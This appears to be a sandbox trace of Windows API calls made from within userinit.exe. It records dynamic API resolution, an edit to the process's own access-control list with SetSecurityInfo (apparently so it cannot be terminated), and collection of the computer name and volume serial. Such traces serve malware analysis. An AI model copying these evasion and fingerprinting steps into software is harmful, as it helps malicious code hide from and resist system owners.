[0110.552] IsValidSid (pSid=0x295f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0110.552] ConvertSidToStringSidA () returned 0x1
[0110.552] LocalFree (hMem=0x13c1c8) returned 0x0
[0110.552] LocalFree (hMem=0x146f70) returned 0x0
[0110.552] ConvertStringSidToSidA () returned 0x1
[0110.552] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f7f8, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x295f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0110.552] IsValidSid (pSid=0x295f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0110.552] ConvertSidToStringSidA () returned 0x1
[0110.552] LocalFree (hMem=0x13c1c8) returned 0x0
[0110.552] LocalFree (hMem=0x146f40) returned 0x0
[0110.552] ConvertStringSidToSidA () returned 0x1
[0110.552] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f880, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x295f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0110.552] IsValidSid (pSid=0x295f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0110.553] ConvertSidToStringSidA () returned 0x1
[0110.553] LocalFree (hMem=0x146f58) returned 0x0
[0110.553] LocalFree (hMem=0x146f40) returned 0x0
[0110.553] ConvertStringSidToSidA () returned 0x1
[0110.553] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f90c, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x295f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0110.553] IsValidSid (pSid=0x295f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0110.553] ConvertSidToStringSidA () returned 0x1
[0110.553] LocalFree (hMem=0x146f58) returned 0x0
[0110.553] LocalFree (hMem=0x146f40) returned 0x0
[0110.553] ConvertStringSidToSidA () returned 0x1
[0110.553] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f998, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x295f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0110.553] IsValidSid (pSid=0x295f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0110.553] ConvertSidToStringSidA () returned 0x1
[0110.553] LocalFree (hMem=0x146f58) returned 0x0
[0110.553] LocalFree (hMem=0x146f40) returned 0x0
[0110.553] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.553] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0110.553] GetCurrentThread () returned 0xfffffffe
[0110.553] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.553] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0110.553] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x24ea54 | out: TokenHandle=0x24ea54*=0x2833756) returned 0
[0110.553] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.554] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0110.554] GetCurrentProcess () returned 0xffffffff
[0110.554] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.554] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0110.554] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x295fa3c | out: TokenHandle=0x295fa3c*=0x1d0) returned 1
[0110.554] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.554] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0110.554] MapGenericMask (in: AccessMask=0x24e8cc, GenericMapping=0x24e8d0 | out: AccessMask=0x24e8cc)
[0110.554] MapGenericMask (in: AccessMask=0x24ea00, GenericMapping=0x24ea04 | out: AccessMask=0x24ea00)
[0110.554] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.554] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0110.555] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24ea14 | out: TokenInformation=0x0, ReturnLength=0x24ea14) returned 0
[0110.555] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.555] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0110.555] GetLastError () returned 0x7a
[0110.555] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.555] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0110.555] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x140780, TokenInformationLength=0x24, ReturnLength=0x24ea38 | out: TokenInformation=0x140780, ReturnLength=0x24ea38) returned 1
[0110.555] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fab0, pSourceSid=0x140788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x295fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.555] IsValidSid (pSid=0x295fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.555] ConvertSidToStringSidA () returned 0x1
[0110.555] LocalFree (hMem=0x139e80) returned 0x0
[0110.555] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.555] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0110.555] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fb34, pSourceSid=0x295fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x295fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.555] IsValidSid (pSid=0x295fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.555] ConvertSidToStringSidA () returned 0x1
[0110.555] LocalFree (hMem=0x139e80) returned 0x0
[0110.556] IsValidSid (pSid=0x295fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.556] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.556] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0110.556] CloseHandle (hObject=0x1d0) returned 1
[0110.556] ConvertStringSidToSidA () returned 0x1
[0110.556] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fa54, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x295fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0110.556] IsValidSid (pSid=0x295fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0110.556] ConvertSidToStringSidA () returned 0x1
[0110.556] LocalFree (hMem=0x146f58) returned 0x0
[0110.556] LocalFree (hMem=0x146f40) returned 0x0
[0110.556] ConvertStringSidToSidA () returned 0x1
[0110.556] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fae0, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x295fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0110.556] IsValidSid (pSid=0x295fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0110.556] ConvertSidToStringSidA () returned 0x1
[0110.556] LocalFree (hMem=0x146f58) returned 0x0
[0110.556] LocalFree (hMem=0x146f40) returned 0x0
[0110.556] ConvertStringSidToSidA () returned 0x1
[0110.556] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fbfc, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x295fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0110.556] IsValidSid (pSid=0x295fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0110.556] ConvertSidToStringSidA () returned 0x1
[0110.556] LocalFree (hMem=0x146f58) returned 0x0
[0110.556] LocalFree (hMem=0x146f40) returned 0x0
[0110.556] ConvertStringSidToSidA () returned 0x1
[0110.556] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fc8c, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x295fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0110.556] IsValidSid (pSid=0x295fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0110.556] ConvertSidToStringSidA () returned 0x1
[0110.556] LocalFree (hMem=0x146f58) returned 0x0
[0110.556] LocalFree (hMem=0x146f40) returned 0x0
[0110.556] ConvertStringSidToSidA () returned 0x1
[0110.556] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fd1c, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x295fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0110.556] IsValidSid (pSid=0x295fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0110.556] ConvertSidToStringSidA () returned 0x1
[0110.557] LocalFree (hMem=0x146f58) returned 0x0
[0110.557] LocalFree (hMem=0x146f40) returned 0x0
[0110.557] GetCurrentProcessId () returned 0xf9c
[0110.557] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xf9c) returned 0x1d0
[0110.557] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.557] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0110.557] GetSecurityInfo () returned 0x0
[0110.559] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.559] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0110.560] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x140f28, pControl=0x24e7da, lpdwRevision=0x24e7d4 | out: pControl=0x24e7da, lpdwRevision=0x24e7d4) returned 1
[0110.560] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.560] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0110.560] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x140f28, pOwner=0x24e7d0, lpbOwnerDefaulted=0x24e7c4 | out: pOwner=0x24e7d0*=0x0, lpbOwnerDefaulted=0x24e7c4) returned 1
[0110.560] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.560] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0110.560] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x140f28, pGroup=0x24e7d0, lpbGroupDefaulted=0x24e7c4 | out: pGroup=0x24e7d0*=0x0, lpbGroupDefaulted=0x24e7c4) returned 1
[0110.560] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.560] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0110.560] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x140f28, lpbDaclPresent=0x24e7c8, pDacl=0x24e7bc, lpbDaclDefaulted=0x24e7c4 | out: lpbDaclPresent=0x24e7c8, pDacl=0x24e7bc, lpbDaclDefaulted=0x24e7c4) returned 1
[0110.560] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.560] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0110.560] IsValidAcl (pAcl=0x140f3c) returned 1
[0110.561] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.561] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0110.561] GetAce (in: pAcl=0x140f3c, dwAceIndex=0x0, pAce=0x24e65c | out: pAce=0x24e65c*=0x140f44) returned 1
[0110.561] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295fe74, pSourceSid=0x140f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x295fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.561] IsValidSid (pSid=0x295fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.561] ConvertSidToStringSidA () returned 0x1
[0110.561] LocalFree (hMem=0x147018) returned 0x0
[0110.561] GetAce (in: pAcl=0x140f3c, dwAceIndex=0x1, pAce=0x24e65c | out: pAce=0x24e65c*=0x140f5c) returned 1
[0110.561] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295ff60, pSourceSid=0x140f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x295ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.561] IsValidSid (pSid=0x295ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.561] ConvertSidToStringSidA () returned 0x1
[0110.561] LocalFree (hMem=0x147018) returned 0x0
[0110.561] GetAce (in: pAcl=0x140f3c, dwAceIndex=0x2, pAce=0x24e65c | out: pAce=0x24e65c*=0x140f70) returned 1
[0110.561] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29529c0, pSourceSid=0x140f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x29529c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0110.561] IsValidSid (pSid=0x29529c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0110.561] ConvertSidToStringSidA () returned 0x1
[0110.561] LocalFree (hMem=0x147018) returned 0x0
[0110.561] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.561] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0110.561] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x140f28, lpbSaclPresent=0x24e7cc, pSacl=0x24e7c0, lpbSaclDefaulted=0x24e7c4 | out: lpbSaclPresent=0x24e7cc, pSacl=0x24e7c0, lpbSaclDefaulted=0x24e7c4) returned 1
[0110.561] LocalFree (hMem=0x140f28) returned 0x0
[0110.561] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.562] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.562] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0110.562] GetLengthSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0110.562] GetLastError () returned 0x0
[0110.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.562] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0110.562] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.562] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0110.562] InitializeAcl (in: pAcl=0x147fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x147fa8) returned 1
[0110.562] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.562] GetLengthSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0110.562] GetLastError () returned 0x0
[0110.562] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.562] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0110.562] SetLastError (dwErrCode=0x0)
[0110.563] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.563] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0110.563] GetSidSubAuthorityCount (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x295f615
[0110.563] GetLastError () returned 0x0
[0110.563] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.563] SetLastError (dwErrCode=0x0)
[0110.563] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.563] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0110.563] GetSidIdentifierAuthority (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x295f616
[0110.563] GetLastError () returned 0x0
[0110.563] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.563] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.563] SetLastError (dwErrCode=0x0)
[0110.563] GetSidSubAuthorityCount (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x295f615
[0110.563] GetLastError () returned 0x0
[0110.563] SetLastError (dwErrCode=0x0)
[0110.563] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.563] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0110.563] GetSidSubAuthority (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x295f61c
[0110.563] GetLastError () returned 0x0
[0110.563] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.563] GetLengthSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0110.563] GetLastError () returned 0x0
[0110.564] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.564] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0110.564] AddAce (in: pAcl=0x147fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x132f90, nAceListLength=0x14 | out: pAcl=0x147fa8) returned 1
[0110.564] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.564] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0110.564] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.564] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0110.564] SetSecurityInfo () returned 0x0
[0110.564] CloseHandle (hObject=0x1d0) returned 1
[0110.564] GetComputerNameA (in: lpBuffer=0x295fd84, nSize=0x24ea94 | out: lpBuffer="CRH2YWU7", nSize=0x24ea94) returned 1
[0110.565] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.565] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.565] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.565] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.565] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e988, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
